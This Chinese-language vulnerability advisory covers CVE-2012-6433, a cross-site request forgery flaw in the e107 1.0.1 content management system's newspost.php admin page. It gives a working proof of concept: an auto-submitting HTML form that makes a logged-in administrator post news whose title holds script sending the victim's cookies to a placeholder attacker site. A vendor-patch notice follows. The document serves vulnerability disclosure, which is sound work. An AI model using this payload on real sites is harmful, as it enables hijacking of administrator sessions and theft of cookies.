e107 '/e107_admin/newspost.php'跨站请求伪造漏洞

e107 '/e107_admin/newspost.php'跨站请求伪造漏洞

发布日期：2013-01-02
更新日期：2013-01-08

受影响系统：
e107 e107 1.0.1
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57092
 CVE(CAN) ID: CVE-2012-6433
 
e107是用php编写的内容管理系统。

e107 1.0.1及其他版本的e107_admin/newspost.php存在CSRF漏洞，该漏洞使得攻击者可以劫持管理员权限发送恶意post请求，并进一步通过构造create操作内的news_title参数来执行跨站脚本攻击。
 
<*来源：Joshua Reynolds
 
  链接：http://www.exploit-db.com/exploits/23828/
        http://xforce.iss.net/xforce/xfdb/80903
 *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
Exploit:

 <html>
 <body onload="document.formCSRF.submit();">
    <form method="POST" name="formCSRF" action="http://[site]/e107_admin/newspost.php?create">
        <input type="hidden" name="cat_id" value="1"/>
        <input type="hidden" name="news_title" value="<script>location.href='http://[evil_site]/cookiemonster.php?cookie='+document.cookie;</script>"
        <input type="hidden" name="news_summary" value=""/>
        <input type="hidden" name="data" value=""/>
        <input type="hidden" name="news" value=""/>
        <input type="hidden" name="sizeselect" value=""/>
        <input type="hidden" name="preimageselect" value=""/>
        <input type="hidden" name="news_extended" value=""/>
        <input type="hidden" name="extended" value=""/>
        <input type="hidden" name="sizeselect" value=""/>
        <input type="hidden" name="preimageselect" value=""/>
        <input type="hidden" name="file_userfile[]" value=""/>
        <input type="hidden" name="uploadtype[]" value="resize"/>
        <input type="hidden" name="resize_value" value="100"/>
        <input type="hidden" name="news_allow_comments" value="0"/>
        <input type="hidden" name="news_rendertype" value="0"/>
        <input type="hidden" name="news_start" value=""/>
        <input type="hidden" name="news_end" value=""/>
        <input type="hidden" name="news_datestamp" value=""/>
        <input type="hidden" name="news_userclass[0]" value="1"/>
        <input type="hidden" name="news_author" value="1"/>
        <input type="hidden" name="submit_news" value="Post news to database"/>
        <input type="hidden" name="news_id" value=""/>
    </form>
 </body>
 </html>

建议：
--------------------------------------------------------------------------------
厂商补丁：
 
e107
 ----
 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：
 
http://e107plugins.co.uk/